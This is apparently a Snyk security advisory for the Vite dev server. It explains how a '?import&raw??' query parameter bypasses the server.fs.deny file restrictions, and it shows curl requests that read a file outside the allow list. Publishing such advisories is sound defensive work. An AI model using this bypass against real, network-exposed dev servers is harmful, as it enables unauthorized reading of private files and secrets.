Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
A fix was pushed into the master branch but not yet published.
org.webjars.npm:vite is a Native-ESM powered web dev build tool.

Affected versions of this package are vulnerable to Incorrect Authorization due to missing checks in transformMiddleware(), which ignores certain query parameters. An attacker can access unauthorized files by appending a ?raw?? or ?import&raw?? URL parameter to the request. The allow list used by server.fs.deny() is not checked when handling these queries, and the file contents are returned.
Note: The dev server is configured by default to be inaccessible. This is only exploitable if the dev server is exposed to the network with either the --host command line option or the server.host config option.
$ echo "top secret content" > /tmp/secret.txt
# expected behavior
$ curl "http://localhost:5173/@fs/tmp/secret.txt"
<body>
<h1>403 Restricted</h1>
<p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.
# security bypassed
$ curl "http://localhost:5173/@fs/tmp/secret.txt?import&raw??"
export default "top secret content\n"